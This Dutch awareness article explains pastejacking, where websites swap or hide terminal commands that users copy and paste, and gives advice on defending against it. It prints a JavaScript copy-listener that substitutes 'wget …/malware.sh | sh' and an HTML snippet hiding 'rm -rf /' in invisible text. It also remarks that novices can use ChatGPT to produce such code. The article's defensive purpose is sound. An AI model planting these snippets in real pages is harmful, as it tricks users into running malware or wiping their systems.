Waarom je geen commando's van het internet moet kopiëren-plakken
Van computers tot mobiele telefoons, kopiëren komt overal voor. Het maakt het leven makkelijker en bespaart je tijd omdat je geen lange commando’s of overbodige teksten hoeft te typen. Als je echter niet voorzichtig genoeg bent, kun je gehackt worden door eenvoudigweg commando’s op de terminal van je computer te kopiëren.
Zullen we ons verdiepen in de mogelijke kwetsbaarheden die gepaard gaan met het dupliceren en invoegen van tekst en de voorzorgsmaatregelen bespreken die kunnen worden gebruikt om je tegen dergelijke risico’s te beschermen?
Waarom je geen commando’s moet kopiëren-plakken
Of je nu een onervaren gebruiker bent van de opdrachtregelinterface of een ervaren beoefenaar, het is niet ongewoon dat mensen hun toevlucht nemen tot het kopiëren en plakken van commando’s die ze van online bronnen hebben gehaald als een manier om hun werkproces te versnellen en hun productiviteit te verhogen. Hoewel deze aanpak op het eerste gezicht efficiënt lijkt, is het belangrijk om te erkennen dat bepaalde kwaadwillende websites misbruik maken van deze praktijk door schadelijke code in te sluiten in gekopieerde tekstvakken en zo heimelijk malware te introduceren in de systemen van nietsvermoedende gebruikers wanneer ze onschuldig commando’s in hun terminals plakken.
Om kwaadaardige richtlijnen te verdoezelen, hebben deze kwaadwillende individuen een reeks bedrieglijke technieken gebruikt binnen hun front-end implementatie, waarbij ogenschijnlijk onschuldige code wordt gebruikt als façade voor heimelijke en schadelijke acties.
Het uitvoeren van het commando “sudo apt-get update && apt-get upgrade” wordt meestal gebruikt om de repository bij te werken en pakketten te upgraden op een Linux systeem. Het is echter belangrijk om voorzichtig te zijn met het gebruik van het “sudo” voorvoegsel, omdat het beheerdersrechten verleent, waardoor mogelijk kwaadaardige code kan worden uitgevoerd zonder dat de gebruiker zich daarvan bewust is. Daarom is het essentieel om de authenticiteit van alle commando’s te controleren voordat je ze in de terminal invoert.
In een nijpende situatie is het denkbaar dat een volledige omverwerping van het systeem of een ransomware-aanval het gevolg is. Maar wat zijn precies de tactieken die deze kwaadwillende entiteiten gebruiken om dergelijke acties uit te voeren? Hoe kunnen schadelijke richtlijnen worden gecamoufleerd in ogenschijnlijk onschuldige code?
Hoe kwaadaardige code-exploits werken
Deze aanval kan worden uitgevoerd met behulp van ingewikkeld ontworpen JavaScript-code of zelfs fundamentele HTML-syntaxis.De JavaScript-taal is uitgerust met een instrument dat bekend staat als de “EventListener,” waarmee verschillende gebeurtenissen die zich in een webbrowser kunnen voordoen, kunnen worden gedetecteerd en afgehandeld, inclusief maar niet beperkt tot het klikken op een knop, het verzenden van een formulier, het verplaatsen van de cursor, het typen van toetsen of het aanpassen van de grootte van het kijkvenster.
De EventListener is een essentieel hulpmiddel waarmee webapplicaties op de juiste manier kunnen reageren op specifieke gebeurtenissen die worden geïnitieerd door gebruikersacties. Helaas hebben gewetenloze websites misbruik gemaakt van deze nuttige functionaliteit door het onderscheppen van gevallen waarin gebruikers tekst kopiëren en deze vervolgens te vervangen door schadelijke code.
De primaire code die is gebruikt bij het maken van de demonstratieafbeelding is als volgt:
<script>
document.addEventListener('copy', function(event) {
event.preventDefault();
const copiedText = "wget http://localhost:8000/malware.sh | sh";
event.clipboardData.setData('text/plain', copiedText);
});
</script>
Dit is een demonstratie waarbij gewone HTML wordt gebruikt zonder dat er scripttaal zoals JavaScript nodig is:
<p>
sudo apt-get install google-chrome-stable
<span style="color:white;font-size:0pt;">rm -rf /</span>
</p>
Het gebruik van een onmerkbaar wit lettertype verbergt het snode commando “rm -rf /”, terwijl het gebruik van een HTML-regelafbrekingselement ( ) bepaalde terminals in staat stelt de inhoud automatisch uit te voeren bij het plakken. In tegenstelling tot wat vaak wordt gedacht, heb je geen geavanceerde kennis van programmeren of webontwikkeling nodig om zo’n cyberaanval succesvol uit te voeren.
Ondanks een gebrek aan kennis van JavaScript of webontwikkeling kunnen zelfs beginnende gebruikers ChatGPT gebruiken om schadelijke code te ontwikkelen. Door strategische input te leveren, kunnen gewetenloze individuen kwetsbaarheden in het systeem uitbuiten, waardoor de beveiligingsmaatregelen effectief worden aangetast en het systeem schadelijke websites kan genereren die gebruik maken van deze zwakke punten.
Hoe je jezelf kunt beschermen
Hoewel er geen waterdichte methode is om jezelf te beschermen tegen aanvallen met kwaadaardige code, kun je bepaalde voorzorgsmaatregelen nemen, zoals het verbieden van het uitvoeren van JavaScript op websites die als potentieel schadelijk worden beschouwd. Het is echter de moeite waard om op te merken dat veel moderne webapplicaties JavaScript nodig hebben om goed te functioneren en dat het volledig uitschakelen ervan het browsen kan belemmeren.
Daarnaast vormt de Cascading Style Sheets-aanpak een uitdaging als het gaat om beveiliging tegen kwaadwillende scripts, omdat er legitieme CSS-code wordt gebruikt, hoewel de intentie ervan schadelijk blijft. Om jezelf effectief te beveiligen, is het belangrijk om fundamentele online hygiënepraktijken en waakzaamheid in acht te nemen.
Wanneer u de opdrachtregel gebruikt, is het raadzaam om voorzichtig te zijn wanneer u door onbekende of verdachte koppelingen navigeert.Om potentiële veiligheidsrisico’s te beperken, wordt gebruikers aangeraden om de authenticiteit van alle commando’s verkregen van externe bronnen te verifiëren door ze in een tekstverwerkingsprogramma te bekijken voordat ze in de terminalomgeving worden uitgevoerd. Door zich te houden aan betrouwbare en gevestigde code repositories, kunnen individuen de kans op het introduceren van schadelijke code in hun systeem via nietsvermoedende middelen minimaliseren.
Bovendien zijn bepaalde terminal emulatoren zoals xfce4-terminal uitgerust met ingebouwde veiligheidsmaatregelen om het ongeoorloofd kopiëren en plakken van commando’s te voorkomen. Deze functie toont een melding die de specifieke acties aangeeft die zullen worden uitgevoerd na het plakken van een commando in de terminal. Om er zeker van te zijn dat uw terminal ook over deze functie beschikt, moet u de beschikbaarheid ervan controleren en deze functie inschakelen.
Kwaadaardige code-executie is zeer gevaarlijk
Zelfs met een antivirusprogramma op zijn plaats, kunnen sommige soorten schadelijke software er nog steeds in slagen om de beveiliging van een apparaat te doorbreken. Daarom is het essentieel om voorzichtig te zijn met het downloaden of kopiëren van code van het internet en de nodige voorzorgsmaatregelen te nemen om je te beschermen tegen mogelijke bedreigingen.